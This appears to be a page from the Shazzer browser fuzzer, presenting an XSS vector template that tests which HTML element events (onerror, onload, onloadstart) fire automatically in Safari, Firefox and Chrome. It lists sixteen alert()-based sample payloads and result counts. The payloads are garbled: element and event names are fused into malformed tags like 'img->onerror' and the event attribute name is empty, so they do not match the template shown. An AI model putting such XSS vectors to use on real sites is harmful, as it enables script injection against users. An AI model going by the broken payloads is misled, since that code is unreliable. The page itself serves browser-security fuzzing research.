    Shazzer
    Shared online fuzzer

    Fuzzing browsers since 2012

    Made by Gareth Heyes

    XSS vectors that execute automatically

    Results per browser: Safari 5, Firefox 5, Chrome 7

    This vector shows which events fire without user interaction

    Created by: hackvertor

    Created on: Wednesday, April 17, 2024 at 6:18:25 PM

    Updated on: Sunday, May 25, 2025 at 12:36:54 AM

    Vector type: XSS

    Vector charset: UTF-8

    Vector data 1: html

    Vector data 2: events

    Template used:
    <$[data1] src=1 srcdoc=1 data=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]>
    <$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]>

    Sample payloads

    <img->onerror src=1 srcdoc=1 data=1 href=1 ="alert('img->onerror->')"></img->onerror>
    <img->onerror ="alert('img->onerror->')"></img->onerror>
    <audio->onerror src=1 srcdoc=1 data=1 href=1 ="alert('audio->onerror->')"></audio->onerror>
    <audio->onerror ="alert('audio->onerror->')"></audio->onerror>
    <audio->onloadstart src=1 srcdoc=1 data=1 href=1 ="alert('audio->onloadstart->')"></audio->onloadstart>
    <audio->onloadstart ="alert('audio->onloadstart->')"></audio->onloadstart>
    <video->onerror src=1 srcdoc=1 data=1 href=1 ="alert('video->onerror->')"></video->onerror>
    <video->onerror ="alert('video->onerror->')"></video->onerror>
    <video->onloadstart src=1 srcdoc=1 data=1 href=1 ="alert('video->onloadstart->')"></video->onloadstart>
    <video->onloadstart ="alert('video->onloadstart->')"></video->onloadstart>
    <object->onerror src=1 srcdoc=1 data=1 href=1 ="alert('object->onerror->')"></object->onerror>
    <object->onerror ="alert('object->onerror->')"></object->onerror>
    <style->onload src=1 srcdoc=1 data=1 href=1 ="alert('style->onload->')"></style->onload>
    <style->onload ="alert('style->onload->')"></style->onload>
    <iframe->onload src=1 srcdoc=1 data=1 href=1 ="alert('iframe->onload->')"></iframe->onload>
    <iframe->onload ="alert('iframe->onload->')"></iframe->onload>

    Fuzz results

    Safari 17.4.1 (updated Wed Apr 17 2024): found 5 results
    Firefox 125.0 (updated Thu Apr 18 2024): found 5 results
    Chrome 124.0.0.0 (updated Wed Apr 24 2024): found 7 results